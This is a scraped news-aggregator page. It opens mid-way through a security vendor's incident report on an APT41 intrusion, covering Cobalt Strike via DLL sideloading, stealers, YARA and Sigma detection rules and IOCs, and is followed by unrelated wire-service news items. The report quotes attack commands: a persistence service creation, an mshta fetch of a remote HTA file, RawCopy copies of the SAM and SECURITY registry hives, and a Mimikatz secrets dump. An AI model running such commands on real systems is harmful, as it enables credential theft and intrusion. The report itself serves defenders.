    c:programdata

    c:programdatausoshared

    c:userspublicdownloads

    c:userspublic

    c:windowshelphelp

    c:userspublicvideos

    Files from these directories were then executed remotely using the WMI toolkit:

    Lateral movement via privileged accounts

    C2 communication

    Cobalt Strike

    The attackers used Cobalt Strike for C2 communication on compromised hosts. They distributed the tool as an encrypted file, typically with a TXT or INI extension. To decrypt it, they employed a malicious library injected into a legitimate application via DLL sideloading.

    Here’s a general overview of how Cobalt Strike was launched:

    Attackers placed all the required files – the legitimate application, the malicious DLL, and the payload file – in one of the following directories:

    C:UsersPublic

    C:Users{redacted}Downloads

    C:WindowsTasks

    The malicious library was a legitimate DLL modified to search for an encrypted Cobalt Strike payload in a specifically named file located in the same directory. Consequently, the names of the payload files varied depending on what was hardcoded into the malicious DLL.

    During the attack, the threat actor used the following versions of modified DLLs and their corresponding payloads:

    Legitimate file name DLL Encrypted Cobalt Strike
    TmPfw.exe TmDbg64.dll TmPfw.ini
    cookie_exporter.exe msedge.dll Logs.txt
    FixSfp64.exe log.dll Logs.txt
    360DeskAna64.exe WTSAPI32.dll config.ini
    KcInst.exe KcInst32.dll kcinst.log
    MpCmdRunq.exe mpclient.dll Logs.txt

    Despite using various legitimate applications to launch Cobalt Strike, the payload decryption process was similar across instances. Let’s take a closer look at one example of Cobalt Strike execution, using the legitimate file cookie_exporter.exe, which is part of Microsoft Edge. When launched, this application loads msedge.dll, assuming it’s in the same directory.

    The attackers renamed cookie_exporter.exe to Edge.exe and replaced msedge.dll with their own malicious library of the same name.

    When any dynamic library is loaded, the DllEntryPoint function is executed first. In the modified DLL, this function included a check for a debugging environment. Additionally, upon its initial execution, the library verified the language packs installed on the host.. The malicious code would not run if it detected any of the following language packs:

    • Japanese (Japan)
    • Korean (South Korea)
    • Chinese (Mainland China)
    • Chinese (Taiwan)

    If the system passes the checks, the application that loaded the malicious library executes an exported DLL function containing the malicious code. Because different applications were used to launch the library in different cases, the exported functions vary depending on what the specific software calls. For example, with msedge.dll, the malicious code was implemented in the ShowMessageWithString function, called by cookie_exporter.exe.

    The ShowMessageWithString function retrieves its payload from Logs.txt, a file located in the same directory. These filenames are typically hardcoded in the malicious dynamic link libraries we’ve observed.

    The screenshot below shows a disassembled code segment responsible for loading the encrypted file. It clearly reveals the path where the application expects to find the file.

    The payload is decrypted by repeatedly executing the following instructions using 128-bit SSE registers:

    Once the payload is decrypted, the malicious executable code from msedge.dll launches it by using a standard method: it allocates a virtual memory region within its own process, then copies the code there and executes it by creating a new thread. In other versions of similarly distributed Cobalt Strike agents that we examined, the malicious code could also be launched by creating a new process or upon being injected into the memory of another running process.

    Beyond the functionality described above, we also found a code segment within the malicious libraries that appeared to be a message to the analyst. These strings are supposed to be displayed if the DLL finds itself running in a debugger, but in practice this doesn’t occur.

    Once Cobalt Strike successfully launches, the implant connects to its C2 server. Threat actors then establish persistence on the compromised host by creating a service with a command similar to this:

    1

    C:Windowssystem32cmd.exe /C sc create “server power” binpath= “cmd /c start C:WindowstasksEdge.exe” && sc description “server power” “description” && sc config “server power” start= auto && net start “server power”

    Attackers often use the following service names for embedding Cobalt Strike:

    server power

    WindowsUpdats

    7–zip Update

    Agent

    During our investigation, we uncovered a compromised SharePoint server that the attackers were using as the C2. They distributed files named agents.exe and agentx.exe via the SMB protocol to communicate with the server. Each of these files is actually a C# Trojan whose primary function is to execute commands it receives from a web shell named CommandHandler.aspx, which is installed on the SharePoint server. The attackers uploaded multiple versions of these agents to victim hosts. All versions had similar functionality and used a hardcoded URL to retrieve commands:

    The agents executed commands from CommandHandler.aspx using the cmd.exe command shell launched with the /c flag.

    While analyzing the agents, we didn’t find significant diversity in their core functionality, despite the attackers constantly modifying the files. Most changes were minor, primarily aimed at evading detection. Outdated file versions were removed from the compromised hosts.

    The attackers used the deployed agents to conduct reconnaissance and collect sensitive data, such as browser history, text files, configuration files, and documents with .doc, .docx and .xlsx extensions. They exfiltrated the data back to the SharePoint server via the upload.ashx web shell.

    It is worth noting that the attackers made some interesting mistakes while implementing the mechanism for communicating with the SharePoint server. Specifically, if the CommandHandler.aspx web shell on the server was unavailable, the agent would attempt to execute the web page’s error message as a command:

    Obtaining a command shell: reverse shell via an HTA file

    If, after their initial reconnaissance, the attackers deemed an infected host valuable for further operations, they’d try to establish an alternative command-shell access. To do this, they executed the following command to download from an external resource a malicious HTA file containing an embedded JavaScript script and run this file:

    1

    “cmd.exe” /c mshta hxxp[:]//github.githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta

    The group attempted to mask their malicious activity by using resources that mimicked legitimate ones to download the HTA file. Specifically, the command above reached out to the GitHub-impersonating domain github[.]githubassets[.]net. The attackers primarily used the site to host JavaScript code. These scripts were responsible for delivering either the next stage of their malware or the tools needed to further the attack.

    At the time of our investigation, a harmless script was being downloaded from github[.]githubassets[.]net instead of a malicious one. This was likely done to hide the activity and complicate attack analysis.

    The harmless script found on github[.]githubassets[.]net

    However, we were able to obtain and analyze previously distributed scripts, specifically the malicious file 2CD15977B72D5D74FADEDFDE2CE8934F. Its primary purpose is to create a reverse shell on the host, giving the attackers a shell for executing their commands.

    Once launched, the script gathers initial host information:

    It then connects to the C2 server, also located at github[.]githubassets[.]net, and transmits a unique ATTACK_ID along with the initially collected data. The script leverages various connection methods, such as WebSockets, AJAX, and Flash. The choice depends on the capabilities available in the browser or execution environment.

    Data collection

    Next, the attackers utilized automation tools such as stealers and credential-harvesting utilities to collect sensitive data. We detail these tools below. Data gathered by these utilities was also exfiltrated via the compromised SharePoint server. In addition to the aforementioned web shell, the SMB protocol was used to upload data to the server. The files were transferred to a network share on the SharePoint server.

    Pillager

    A modified version of the Pillager utility stands out among the tools the attackers deployed on hosts to gather sensitive information. This tool is used to export and decrypt data from the target computer. The original Pillager version is publicly available in a repository, accompanied by a description in Chinese.

    The primary types of data collected by this utility include:

    • Saved credentials from browsers, databases, and administrative utilities like MobaXterm
    • Project source code
    • Screenshots
    • Active chat sessions and data
    • Email messages
    • Active SSH and FTP sessions
    • A list of software installed on the host
    • Output of the systeminfo and tasklist commands
    • Credentials stored and used by the operating system, and Wi-Fi network credentials
    • Account information from chat apps, email clients, and other software

    A sample of data collected by Pillager:

    The utility is typically an executable (EXE) file. However, the attackers rewrote the stealer’s code and compiled it into a DLL named wmicodegen.dll. This code then runs on the host via DLL sideloading. They chose convert-moftoprovider.exe, an executable from the Microsoft SDK toolkit, as their victim application. It is normally used for generating code from Managed Object Format (MOF) files.

    Despite modifying the code, the group didn’t change the stealer’s default output file name and path: C:WindowsTempPillager.zip.

    It’s worth noting that the malicious library they used was based on the legitimate SimpleHD.dll HDR rendering library from the Xbox Development Kit. The source code for this library is available on GitHub. This code was modified so that convert-moftoprovider.exe loaded an exported function, which implemented the Pillager code.

    Interestingly, the path to the PDB file, while appearing legitimate, differs by using PS5 instead of XBOX:

    Checkout

    The second stealer the attackers employed was Checkout. In addition to saved credentials and browser history, it also steals information about downloaded files and credit card data saved in the browser.

    When launching the stealer, the attackers pass it a j8 parameter; without it, the stealer won’t run. The malware collects data into CSV files, which it then archives and saves as CheckOutData.zip in a specially created directory named CheckOut.

    Data collection and archiving in Checkout

    Checkout launch diagram in Kaspersky Threat Intelligence Platform

    RawCopy

    Beyond standard methods for gathering registry dumps, such as using reg.exe, the attackers leveraged the publicly available utility RawCopy (MD5 hash: 0x15D52149536526CE75302897EAF74694) to copy raw registry files.

    RawCopy is a command-line application that copies files from NTFS volumes using a low-level disk reading method.

    The following commands were used to collect registry files:

    c:userspublicdownloadsRawCopy.exe /FileNamePath:C:WindowsSystem32Configsystem /OutputPath:c:userspublicdownloads

    c:userspublicdownloadsRawCopy.exe /FileNamePath:C:WindowsSystem32Configsam /OutputPath:c:userspublicdownloads

    c:userspublicdownloadsRawCopy.exe /FileNamePath:C:WindowsSystem32Configsecurity /OutputPath:c:userspublicdownloads

    Mimikatz

    The attackers also used Mimikatz to dump account credentials. Like the Pillager stealer, Mimikatz was rewritten and compiled into a DLL. This DLL was then loaded by the legitimate java.exe file (used for compiling Java code) via DLL sideloading. The following files were involved in launching Mimikatz:

    C:WindowsTemp123.bat

    C:WindowsTempjli.dll

    C:WindowsTempjava.exe

    С:WindowsTempconfig.ini

    123.bat is a BAT script containing commands to launch the legitimate java.exe executable, which in turn loads the dynamic link library for DLL sideloading. This DLL then decrypts and executes the Mimikatz configuration file, config.ini, which is distributed from a previously compromised host within the infrastructure.

    1

    java.exe privilege::debug token::elevate lsadump::secrets exit

    Retrospective threat hunting

    As already mentioned, the victim organization’s monitoring coverage was initially patchy. Because of this, in the early stages, we only saw the external IP address of the initial source and couldn’t detect what was happening on that host. After some time, the host was finally connected to our monitoring systems, and we found that it was an IIS web server. Furthermore, despite the lost time, it still contained artifacts of the attack.

    These included the aforementioned Cobalt Strike implant located in c:programdata, along with a scheduler task for establishing persistence on the system. Additionally, a web shell remained on the host, which our solutions detected as HEUR:Backdoor.MSIL.WebShell.gen. This was found in the standard temporary directory for compiled ASP.NET application files:

    c:windowsmicrosoft.netframework64v4.0.30319temporary asp.net filesrootdedc22b849ac6571app_web_hdmuushc.dll

    MD5: 0x70ECD788D47076C710BF19EA90AB000D

    These temporary files are automatically generated and contain the ASPX page code:

    The web shell was named newfile.aspx. The screenshot above shows its function names. Based on these names, we were able to determine that this instance utilized a Neo-reGeorg web shell tunnel.

    This tool is used to proxy traffic from an external network to an internal one via an externally accessible web server. Thus, the launch of the Impacket tools, which we initially believed was originating from a host unidentified at the time (the IIS server), was in fact coming from the external network through this tunnel.

    Attribution

    We attribute this attack to APT41 with a high degree of confidence, based on the similarities in the TTPs, tooling, and C2 infrastructure with other APT41 campaigns. In particular:

    • The attackers used a number of tools characteristic of APT41, such as Impacket, WMI, and Cobalt Strike.
    • The attackers employed DLL sideloading techniques.
    • During the attack, various files were saved to C:WindowsTemp.
    • The C2 domain names identified in this incident (s3-azure.com, *.ns1.s3-azure.com, *.ns2.s3-azure.com) are similar to domain names previously observed in APT41 attacks (us2[.]s3bucket-azure[.]online, status[.]s3cloud-azure[.]com).

    Takeaways and lessons learned

    The attackers wield a wide array of both custom-built and publicly available tools. Specifically, they use penetration testing tools like Cobalt Strike at various stages of an attack. The attackers are quick to adapt to their target’s infrastructure, updating their malicious tools to account for specific characteristics. They can even leverage internal services for C2 communication and data exfiltration. The files discovered during the investigation indicate that the malicious actor modifies its techniques during an attack to conceal its activities – for example, by rewriting executables and compiling them as DLLs for DLL sideloading.

    While this story ended relatively well – we ultimately managed to evict the attackers from the target organization’s systems – it’s impossible to counter such sophisticated attacks without a comprehensive knowledge base and continuous monitoring of the entire infrastructure. For example, in the incident at hand, some assets weren’t connected to monitoring systems, which prevented us from seeing the full picture immediately. It’s also crucial to maintain maximum coverage of your infrastructure with security tools that can automatically block malicious activity in the initial stages. Finally, we strongly advise against granting excessive privileges to accounts, and especially against using such accounts on all hosts across the infrastructure.

    Appendix

    Rules

    Yara

    strings:
    $func1 = “FrameworkInitialize” fullword
    $func2 = “GetTypeHashCode” fullword
    $func3 = “ProcessRequest” fullword
    $func4 = “__BuildControlTree”
    $func5 = “__Render__control1”

    $str1 = “FAIL” nocase wide
    $str2 = “Port close” nocase wide
    $str3 = “Port filtered” nocase wide
    $str4 = “DISCONNECT” nocase wide
    $str5 = “FORWARD” nocase wide

    condition:
    uint16(0) == 0x5A4D and
    filesize

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    rule neoregeorg_aspx_web_shell

    {

        meta:

            description = “Rule to detect neo-regeorg based ASPX web-shells”

            author = “Kaspersky”

            copyright = “Kaspersky”

            distribution = “DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM”

        strings:

            $func1 = “FrameworkInitialize” fullword

            $func2 = “GetTypeHashCode” fullword

            $func3 = “ProcessRequest” fullword

            $func4 = “__BuildControlTree”

            $func5 = “__Render__control1”

            $str1 = “FAIL” nocase wide

            $str2 = “Port close” nocase wide

            $str3 = “Port filtered” nocase wide

            $str4 = “DISCONNECT” nocase wide

            $str5 = “FORWARD” nocase wide

            

        condition:

            uint16(0) == 0x5A4D and

            filesize 400000 and

            3 of ($func*) and

            3 of ($str*)

    }

    Sigma

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    title: Service Image Path Start From CMD

    id: faf1e809–0067–4c6f–9bef–2471bd6d6278

    status: test

    description: Detects creation of unusual service executable starting from cmd /c using command line

    references:

        – tbd

    tags:

        – attack.persistence

        – attack.T1543.003

    author: Kaspersky

    date: 2025/05/15  

    logsource:                      

        product: windows        

        service: security

    detection:

        selection:

            EventID: 4697

            ServiceFileName|contains:

                – ‘%COMSPEC%’

                – ‘cmd’

                – ‘cmd.exe’

            ServiceFileName|contains|all:

                –  ‘/c’

                – ‘start’

        condition: selection

    falsepositives:

        – Legitimate

    level: medium

    IOCs

    Files

    2F9D2D8C4F2C50CC4D2E156B9985E7CA
    9B4F0F94133650B19474AF6B5709E773
    A052536E671C513221F788DE2E62316C
    91D10C25497CADB7249D47AE8EC94766
    C3ED337E2891736DB6334A5F1D37DC0F
    9B00B6F93B70F09D8B35FA9A22B3CBA1
    15097A32B515D10AD6D793D2D820F2A8
    A236DCE873845BA4D3CCD8D5A4E1AEFD
    740D6EB97329944D82317849F9BBD633
    C7188C39B5C53ECBD3AEC77A856DDF0C
    3AF014DB9BE1A04E8B312B55D4479F69
    4708A2AE3A5F008C87E68ED04A081F18
    125B257520D16D759B112399C3CD1466
    C149252A0A3B1F5724FD76F704A1E0AF
    3021C9BCA4EF3AA672461ECADC4718E6
    F1025FCAD036AAD8BF124DF8C9650BBC
    100B463EFF8295BA617D3AD6DF5325C6
    2CD15977B72D5D74FADEDFDE2CE8934F
    9D53A0336ACFB9E4DF11162CCF7383A0
    27F506B198E7F5530C649B6E4860C958

    Domains and IPs

    47.238.184[.]9
    38.175.195[.]13
    hxxp://github[.]githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta
    hxxp://chyedweeyaxkavyccenwjvqrsgvyj0o1y.oast[.]fun/aaa
    hxxp://toun[.]callback.red/aaa
    hxxp://asd.xkx3[.]callback.[]red
    hxxp[:]//ap-northeast-1.s3-azure[.]com
    hxxps[:]//www[.]msn-microsoft[.]org:2053
    hxxp[:]//www.upload-microsoft[.]com
    s3-azure.com
    *.ns1.s3-azure.com
    *.ns2.s3-azure.com
    upload-microsoft[.]com
    msn-microsoft[.]org

    MITRE ATT&CK

    Tactic Technique ID
    Initial Access Valid Accounts: Domain Accounts T1078.002
    Exploit Public-Facing Application T1190
    Execution Command and Scripting Interpreter: PowerShell T1059.001
    Command and Scripting Interpreter: Windows Command Shell T1059.003
    Scheduled Task/Job: Scheduled Task T1053.005
    Windows Management Instrumentation T1047
    Persistence Create or Modify System Process: Windows Service T1543.003
    Hijack Execution Flow: DLL Side-Loading T1574.002
    Scheduled Task/Job: Scheduled Task T1053.005
    Valid Accounts: Domain Accounts T1078.002
    Web Shell T1505.003
    IIS Components T1505.004
    Privilege Escalation Create or Modify System Process: Windows Service T1543.003
    Hijack Execution Flow: DLL Side-Loading T1574.002
    Process Injection T1055
    Scheduled Task/Job: Scheduled Task T1053.005
    Valid Accounts: Domain Accounts T1078.002
    Defense Evasion Hijack Execution Flow: DLL Side-Loading T1574.002
    Deobfuscate/Decode Files or Information T1140
    Indicator Removal: File Deletion T1070.004
    Masquerading T1036
    Process Injection T1055
    Credential Access Credentials from Password Stores: Credentials from Web Browsers T1555.003
    OS Credential Dumping: Security Account Manager T1003.002
    Unsecured Credentials T1552
    Discovery Network Service Discovery T1046
    Process Discovery T1057
    System Information Discovery T1082
    System Network Configuration Discovery T1016
    Lateral movement Lateral Tool Transfer T1570
    Remote Services: SMB/Windows Admin Shares T1021.002
    Collection Archive Collected Data: Archive via Utility T1560.001
    Automated Collection T1119
    Data from Local System T1005
    Command and Control Application Layer Protocol: Web Protocols T1071.001
    Application Layer Protocol: DNS T1071.004
    Ingress Tool Transfer T1105
    Proxy: Internal Proxy T1090.001
    Protocol Tunneling T1572
    Exfiltration Exfiltration Over Alternative Protocol T1048
    Exfiltration Over Web Service T1567

    MIL OSI Global Banks –

    July 21, 2025
  • MIL-OSI United Kingdom: Appointment to the Criminal Procedure Rule Committee: July 2025

    Source: United Kingdom – Government Statements

    News story

    Appointment to the Criminal Procedure Rule Committee: July 2025

    The Lord Chancellor, after consulting the Lady Chief Justice, has approved the appointment of Bartholomew Dalton as a solicitor member of the Criminal Procedure Rule Committee, for 4 years from 1 September 2025.

    Bartholomew Dalton is a solicitor and key member of the Serious and General Crime team at top-ranked London criminal defence firm Hickman & Rose.

    He has represented clients accused of a wide range of offences and provides expert advice in relation to all stages of criminal cases, from investigation through to trial and appeal. He is an experienced police station representative, litigator and advocate in the Magistrates’ Court and litigator in the Crown Court. He is recommended as an “associate to watch” in Chambers & Partners and as a “key lawyer” in the Legal 500.

    Mr Dalton is the co-author of the 2 most recent editions of the leading practitioners’ handbook Blackstone’s Magistrates’ Court Handbook, published by Oxford University Press, and is currently working on the next edition. He is also a member of Criminal Law Week’s commentary board and a committee member and the law reform officer for the London Criminal Courts Solicitors’ Association.

    Mr Dalton qualified as a solicitor in 2017 before joining Hickman & Rose in 2021.

    The Courts Act 2003 established the Criminal Procedure Rule Committee (CPRC) to make rules and governing the practice and procedure of magistrates’ courts, the Crown Court and the Court of Appeal, Criminal Division.

    Appointments are made, by the Lord Chancellor, under the Courts Act 2003, and are regulated by the Commissioner for Public Appointments. This appointment has been made in line with the Governance Code on Public Appointments.

    Share this page

    The following links open in a new tab

    • Share on Facebook (opens in new tab)
    • Share on Twitter (opens in new tab)

    Updates to this page

    Published 21 July 2025

    MIL OSI United Kingdom –

    July 21, 2025
  • MIL-OSI Russia: Total number of internet users in China exceeds 1.12 billion people /detailed version-1/

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    BEIJING, July 21 (Xinhua) — The number of internet users in China will reach more than 1.12 billion as of June 2025, according to a report released Monday by the China Internet Information Center.

    The document also notes that by the end of June 2025, the internet penetration rate in China will reach 79.7 percent, an increase of 1.1 percentage points compared to December 2024.

    According to the report, China has made significant progress in internet development during the 14th Five-Year Plan period (2021-2025). In particular, efforts to expand internet access have enabled key groups such as the elderly and those living in rural areas to benefit from this progress.

    As of June 2025, the number of internet users aged 60 and above in China reached 161 million, while the number of internet users in rural areas reached 322 million. Moreover, the internet penetration rate among these two groups of the Chinese population reached 52% and 69.2%, respectively.

    Meanwhile, China’s continued internet development has played a key role in promoting Chinese culture both domestically and abroad, the report said, highlighting the booming expansion of Chinese online literature and games into overseas markets and the deepening integration between popular web series and related tourism destinations. -0-

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: Hunchun checkpoint becomes “golden corridor” for import of king crabs from Russia

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    BEIJING, July 21 (Xinhua) — Trucks loaded with king crabs and other seafood line up at the Hunchun port in northeast China’s Jilin Province in the height of summer to clear customs before entering China.

    Truck driver Chen Chen said he can transport up to four tons of king crabs at a time.

    According to the Zhongxinshe news agency, more than 1.5 million units of Kamchatka crabs from Russia are imported into China through the Hunchun checkpoint every year, which accounts for about 80 percent of the country’s total market. Hunchun has truly become a key gateway for China to import this seafood delicacy.

    With the continuous improvement of cross-border logistics and transportation efficiency in recent years, Russian-produced Kamchatka crabs have become part of the daily life of Chinese people.

    Over the past decade, Kamchatka crabs have been sold not only in northeast China, but also served on tables in major cities such as Beijing, Shanghai, Guangzhou and Shenzhen.

    To meet the high market demand, Hunchun City also focused on promoting the Northeast Asia Fresh Seafood Park project with a total investment of over 600 million yuan (about 83.6 million US dollars).

    The park will not only be used for temporary storage of imported seafood, but also to stimulate the development of processing trade to build an important hub for processing and distributing fresh seafood in northern China, said Liu Yansong, head of the park.

    Now tasting king crabs has become a tourist specialty of Hunchun.

    Previously, imported Russian king crabs had to be transported to China via Busan, a city in the southeast of the Republic of Korea. After Hunchun was approved as a specialized checkpoint for importing chilled seafood and edible aquatic animals, this “golden corridor” for importing king crabs into the country was opened. In addition, the Kamchatka-Zarubino-Hunchun route made the transportation of aquatic products between China and Russia more stable and uninterrupted.

    To ensure the freshness of imported seafood, Hunchun Customs has opened a “green channel” to provide inspection and release services by appointment all year round and around the clock, speeding up customs clearance.

    In recent years, Chinese consumers’ interest in Russian Kamchatka crabs has grown rapidly. According to the General Administration of Customs of China, the total value of China’s imports of live, fresh and frozen crabs from Russia exceeded US$1.14 billion last year, up 16.7 percent from the previous year. -0-

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI China: The Guardians: A short video honoring Chinese military’s service 2025-07-21 14:58:10 The Chinese military has released a short film titled “The Guardians” to showcase the dedication of its soldiers in safeguarding their homeland, ensuring everyday peace and promoting global harmony.

    Source: People’s Republic of China – Ministry of National Defense

      2025 marks the 80th anniversary of the victory in the Chinese People’s War of Resistance Against Japanese Aggression (1931–1945) and the World Anti-Fascist War. The Chinese military has released a short video titled “The Guardians” to showcase the dedication of its soldiers in safeguarding their homeland, ensuring everyday peace and promoting global harmony. Chinese soldiers are deserving of our trust. The Chinese military serves as the guardians of all we hold dear.

    loading…

    MIL OSI China News –

    July 21, 2025
  • MIL-OSI Russia: Japan’s Ruling Coalition May Lose Upper House Majority – NHK

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    TOKYO, July 21 (Xinhua) — The coalition led by Japan’s ruling Liberal Democratic Party (LDP) may lose its majority in the House of Councillors (upper house of parliament) in Sunday’s elections, public broadcaster NHK reported.

    According to NHK, the LDP-Komeito coalition will not be able to secure the 125 seats needed to maintain a majority.

    The House of Councillors consists of 248 members. The term of office of statesmen is 6 years. Every three years, half of the composition of the House is renewed.

    The main opposition Constitutional Democratic Party of Japan is expected to increase its seat count, while the Democratic Party for the People (DPPP) and the Sanseito Party are also expected to make significant gains, NHK forecasts. –0–

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: Iranian FM warns EU3 countries against renewing sanctions

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    TEHRAN, July 21 (Xinhua) — Iranian Foreign Minister Abbas Araghchi on Sunday warned that Britain, France and Germany (the EU3 countries) should not undermine the credibility of the UN Security Council by triggering a “sanctions snapback mechanism” against Tehran.

    A. Araghchi, in a post on the X social network, said these countries do not have the “legal, political and moral authority” to invoke the provisions of the 2015 nuclear deal or UN Security Council Resolution 2231, which allow for the reimposition of international sanctions if Iran is found to be in non-compliance with the agreement.

    He noted that after the US withdrawal from the nuclear agreement /Joint Comprehensive Plan of Action/ in 2018, Iran exhausted dispute resolution mechanisms before taking steps to correct the situation, and the EU3 countries failed to fulfill their obligations and even supported the US “maximum pressure” policy.

    “The EU3 countries must refrain from any actions that will only deepen differences in the Security Council or have serious negative consequences for its work,” Araghchi said, noting that Iran is ready for “meaningful diplomacy,” but will resist hostile measures.

    Earlier in the day, media reported that Iran and the six international mediators had agreed to resume talks on Tehran’s nuclear program.

    The semi-official Tasnim news agency cited an “informed source” as saying that Iran and the six were holding consultations on the date and venue of the talks. The upcoming talks are expected to be held at the deputy foreign minister level. –0–

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: Breaking: Japan’s PM vows to stay in office after election defeat

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    TOKYO, July 21 (Xinhua) — Japanese Prime Minister Shigeru Ishiba vowed on Monday to remain in office despite a major defeat in the House of Councillors election where the ruling Liberal Democratic Party (LDP) and its coalition partner failed to secure a majority. -0-

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: A simplified customs clearance model has been launched at the Baktu automobile checkpoint on the Chinese-Kazakh border

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    BEIJING, July 21 (Xinhua) — An innovative customs clearance model that exempts cargo from transshipment after it enters the border crossing was officially launched at the Baktu Port of Tacheng County in northwest China’s Xinjiang Uygur Autonomous Region on Sunday, the Xinjiang Daily reported.

    This model allows the company to submit a customs declaration to the customs service at the point of departure of the goods or during transportation, which will perform a number of operations in advance, including verification of the declaration and risk analysis. Then the truck will be able to undergo customs clearance at an accelerated pace upon arrival at the control site at the border crossing, which will significantly reduce the storage and waiting time.

    By implementing this model at the Baktu checkpoint, customs clearance time can be reduced from 3-4 hours to less than 10 minutes.

    The new model will also reduce the company’s operating costs, said Yao Fei, an official at a Xinjiang-based trading firm.

    According to the results of the first five months of this year, 292 thousand tons of cargo were imported and exported through the Baktu checkpoint, which is 3.7 percent more than a year earlier, according to data from the Urumqi Customs Office.

    This customs clearance model was first put into operation in Xinjiang at Alashankou Port in November 2023. Based on the successful experience, Urumqi Customs is working to expand this model to other border crossings in Xinjiang. -0-

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: China strongly opposes EU inclusion of Chinese companies in sanctions list against Russia

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    BEIJING, July 21 (Xinhua) — A Chinese Ministry of Commerce spokesperson on Monday expressed strong dissatisfaction and resolute protest over the European Union’s (EU) decision to include some Chinese companies and financial institutions in the 18th round of sanctions against Russia.

    In response to a media question, a spokesman for the agency said the EU, ignoring repeated statements and objections from China, unilaterally included Chinese companies in its sanctions list and imposed fines on two Chinese financial institutions based on unfounded accusations.

    China has consistently opposed unilateral sanctions that have no basis in international law and are not sanctioned by the UN Security Council, the representative of the Ministry of Commerce of the People’s Republic of China emphasized.

    According to him, the EU’s actions contradict the consensus reached between the leaders of China and the EU and will have a serious negative impact on trade and economic ties and financial cooperation between the two sides.

    China calls on the EU to immediately stop the wrong practice of including Chinese enterprises and financial institutions on the sanctions list, the ministry spokesman said, adding that the Chinese side will take necessary measures to resolutely protect the legitimate rights and interests of domestic companies and financial institutions. -0-

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI China: Announcement on Open Market Operations No.138 [2025]

    Source: Peoples Bank of China

    Announcement on Open Market Operations No.138 [2025]

    (Open Market Operations Office, July 21, 2025)

    The People’s Bank of China conducted reverse repo operations in the amount of RMB170.7 billion through quantity bidding at a fixed interest rate on July 21, 2025.

    Details of the Reverse Repo Operations

    Maturity

    Rate

    Bidding Volume

    Winning Bid Volume

    7 days

    1.40%

    RMB170.7 billion

    RMB170.7 billion

    Date of last update Nov. 29 2018

    2025年07月21日

    MIL OSI China News –

    July 21, 2025
  • MIL-OSI China: Japanese PM vows to stay in office after election setback

    Source: People’s Republic of China – State Council News

    Japanese Prime Minister Shigeru Ishiba on Monday vowed to stay in office despite a significant electoral setback in the House of Councillors election, where the ruling Liberal Democratic Party (LDP) and its coalition partner failed to secure a majority.

    Speaking at a press conference on Monday afternoon, Ishiba acknowledged the disappointing results and expressed a strong sense of responsibility.

    “What is most important right now is to avoid causing stagnation in national politics,” he said, vowing efforts to fulfill the responsibilities as the leading party.

    His remarks came amid growing public dissatisfaction over rising living costs and policy missteps, which analysts say contributed to the poor performance of the ruling bloc.

    According to the final vote count completed in the early hours of Monday, the LDP secured only 39 seats of the 125 contested seats in the upper house election, while Komeito took eight, below their combined target of 50.

    Even with their existing non-contested seats of 75, they now held fewer than the 125 seats needed for a majority in the 248-member upper chamber.

    Despite the setback, Ishiba emphasized the need for stability and continuity in government, and formally declared his intention to continue serving as prime minister. 

    MIL OSI China News –

    July 21, 2025
  • MIL-OSI Russia: Lightning: Alaska Airlines has requested the suspension of all its main US flights, citing an “IT system failure” – media

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    Xinhua | 21.07.2025

    Keywords: USA

    Source: Xinhua

    Flash: Alaska Airlines has requested the suspension of all its main US flights, citing an “IT system failure” — media Flash: Alaska Airlines has requested the suspension of all its main US flights, citing an “IT system failure” — media

